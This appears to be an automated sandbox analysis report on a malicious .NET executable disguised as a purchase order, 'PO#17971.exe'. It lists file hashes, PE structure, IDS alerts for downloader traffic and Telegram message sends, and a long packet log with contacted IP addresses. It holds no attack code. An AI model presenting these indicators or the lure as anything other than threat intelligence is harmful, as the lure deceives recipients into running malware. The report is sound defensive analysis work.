SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.709086520886259
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	PO#17971.exe
File size:	685'568 bytes
MD5:	7a01ce7b443e4c2f5344ef3ec0e21538
SHA1:	90f517920d408f9db6cdbeb6f67ba7c62708c851
SHA256:	ee6993e7afbf9a039db981542c0250e22fcaa01434db911732851c9e52bb38b6
SHA512:	9d14f5fd61cad5696b70bb2ceecadd495b41ebca1f2691d4dce8ccd1504db3c3cf58889df8eb799bda19d481803b727d55867512614f4733116dda77a22d26fc
SSDEEP:	12288:mEwl9Z7a0GM4Rb9So1JELBYaKMwzyrdowvUI69boqatgOr/2MlxSTtXVHM3IN:wawLNOwd69+tgyuMloTpDN
TLSH:	15E401252659D903C0A70B704971D3F967B86E99E921D3038FD9BEFFBD367012A403A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0..V..........Ft... ........@.. ....................................`................................

File Icon


Icon Hash:	5c69494dac09190f

Static PE Info

General

Entrypoint:	0x4a7446
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67809704 [Fri Jan 10 03:41:56 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa73f4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x1a54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa544c	0xa5600	fe0fc1122664091518a5fc62f4a80045	False	0.9073070200302343	data	7.717890393942163	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x1a54	0x1c00	15f307c96d1774e4ba8dd030b5d543ad	False	0.8173828125	data	7.029838420660522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0xc	0x200	a7c1ee103dc23f17f445a6fd6d5a33fd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa80c8	0x1625	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.955194919738931
RT_GROUP_ICON	0xa9700	0x14	data	1.05
RT_VERSION	0xa9724	0x32a	data	0.4148148148148148

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T15:03:40.663634+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	158.101.44.242	80	TCP
2025-01-10T15:03:41.941038+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	158.101.44.242	80	TCP
2025-01-10T15:03:42.448660+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49710	104.21.96.1	443	TCP
2025-01-10T15:03:43.147982+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49711	158.101.44.242	80	TCP
2025-01-10T15:03:43.659105+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49713	104.21.96.1	443	TCP
2025-01-10T15:03:44.450723+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49714	158.101.44.242	80	TCP
2025-01-10T15:03:44.841733+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49716	104.21.96.1	443	TCP
2025-01-10T15:03:45.038599+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49715	158.101.44.242	80	TCP
2025-01-10T15:03:46.132348+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49715	158.101.44.242	80	TCP
2025-01-10T15:03:46.308259+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49719	104.21.96.1	443	TCP
2025-01-10T15:03:46.723367+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49720	104.21.96.1	443	TCP
2025-01-10T15:03:47.351094+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49722	158.101.44.242	80	TCP
2025-01-10T15:03:48.569861+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49726	158.101.44.242	80	TCP
2025-01-10T15:03:50.759268+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49731	104.21.96.1	443	TCP
2025-01-10T15:03:50.918520+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49732	104.21.96.1	443	TCP
2025-01-10T15:03:52.505880+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49735	104.21.96.1	443	TCP
2025-01-10T15:03:53.430446+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49737	149.154.167.220	443	TCP
2025-01-10T15:03:55.788098+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49747	104.21.96.1	443	TCP
2025-01-10T15:03:58.402098+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49756	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:03:39.838371038 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:39.843281031 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:39.848215103 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:39.848668098 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:39.853408098 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:40.415719032 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:40.441118956 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:40.446024895 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:40.605098963 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:40.663634062 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:40.687952995 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:40.688009024 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:40.688198090 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:40.708198071 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:40.708228111 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.190659046 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.191160917 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.209127903 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.209148884 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.209563017 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.351219893 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.489836931 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.531335115 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.619371891 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.619473934 CET	443	49708	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.619524002 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.627280951 CET	49708	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.654695034 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:41.659518957 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:41.822068930 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:41.826857090 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.826904058 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.826973915 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.827430010 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:41.827452898 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:41.941037893 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.312453985 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:42.315287113 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:42.315332890 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:42.448657036 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:42.448729038 CET	443	49710	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:42.448913097 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:42.449311972 CET	49710	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:42.454341888 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.455548048 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.459389925 CET	80	49707	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:42.459456921 CET	49707	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.460339069 CET	80	49711	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:42.460455894 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.460624933 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:42.465444088 CET	80	49711	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:43.024322033 CET	80	49711	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:43.025978088 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.026034117 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.026279926 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.026798010 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.026818991 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.147981882 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.504528999 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.506288052 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.506340027 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.659132004 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.659204960 CET	443	49713	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:43.659260035 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.659837008 CET	49713	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:43.663707972 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.665090084 CET	49714	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.668735981 CET	80	49711	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:43.668823004 CET	49711	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.669863939 CET	80	49714	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:43.670093060 CET	49714	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.670224905 CET	49714	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:43.674978971 CET	80	49714	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.142378092 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.147216082 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.148087025 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.148478985 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.153268099 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.233684063 CET	80	49714	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.235577106 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.235630035 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.236049891 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.236499071 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.236510992 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.450639963 CET	80	49714	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.450722933 CET	49714	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.691082954 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.693240881 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.693275928 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.736049891 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.741085052 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.745881081 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.841700077 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.841941118 CET	443	49716	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.842130899 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.842544079 CET	49716	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.846982002 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.851803064 CET	80	49717	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.851876974 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.851979017 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:44.856750011 CET	80	49717	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.899827957 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:44.947971106 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.948024035 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:44.948134899 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.952172041 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:44.952184916 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.038599014 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:45.581407070 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.581584930 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.600187063 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.600243092 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.600670099 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.647352934 CET	80	49717	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:45.647981882 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.648924112 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.648982048 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.649049044 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.649408102 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.649420977 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.682590008 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.694859028 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:45.723337889 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.795545101 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.795614958 CET	443	49718	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:45.795733929 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.798980951 CET	49718	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:45.802587986 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:45.808269978 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.092962980 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.095155001 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.095196962 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.095308065 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.095700026 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.095722914 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.132348061 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.151524067 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.153501034 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.153546095 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.308283091 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.308357954 CET	443	49719	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.308593988 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.320532084 CET	49719	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.328521967 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.330502987 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.335410118 CET	80	49721	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.335484028 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.335643053 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.340198994 CET	80	49717	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.340261936 CET	49717	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.342653036 CET	80	49721	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.572032928 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.574582100 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.574618101 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.721311092 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.721379995 CET	443	49720	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:46.721574068 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.722179890 CET	49720	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:46.726429939 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.728789091 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.733252048 CET	80	49715	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.733330011 CET	49715	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.735495090 CET	80	49722	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:46.735594988 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.735743999 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:46.742028952 CET	80	49722	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.195346117 CET	80	49721	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.203062057 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.203109980 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.203182936 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.203531981 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.203546047 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.244218111 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.302692890 CET	80	49722	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.307698965 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.307743073 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.307941914 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.312210083 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.312221050 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.351094007 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.657696962 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.659693956 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.659725904 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.770399094 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.772553921 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.772578955 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.799901009 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.799977064 CET	443	49723	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.800038099 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.800674915 CET	49723	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.806864023 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.807250977 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.812278032 CET	80	49721	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.812304020 CET	80	49725	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.812349081 CET	49721	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.812387943 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.812550068 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.817428112 CET	80	49725	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.923919916 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.924088955 CET	443	49724	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:47.924144983 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.924590111 CET	49724	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:47.928908110 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.930008888 CET	49726	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.933912039 CET	80	49722	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.933975935 CET	49722	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.934835911 CET	80	49726	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:47.934905052 CET	49726	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.935044050 CET	49726	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:47.939863920 CET	80	49726	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:48.515544891 CET	80	49726	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:48.517719984 CET	49727	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.517756939 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:48.517822981 CET	49727	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.518230915 CET	49727	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.518241882 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:48.569860935 CET	49726	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:48.811177969 CET	80	49725	158.101.44.242	192.168.2.5
Jan 10, 2025 15:03:48.813447952 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.813493013 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:48.813606977 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.813955069 CET	49728	443	192.168.2.5	104.21.96.1
Jan 10, 2025 15:03:48.813967943 CET	443	49728	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:48.851094961 CET	49725	80	192.168.2.5	158.101.44.242
Jan 10, 2025 15:03:49.002630949 CET	443	49727	104.21.96.1	192.168.2.5
Jan 10, 2025 15:03:49.005551100 CET	49727	443	192.168.2.5	104.21.96.1
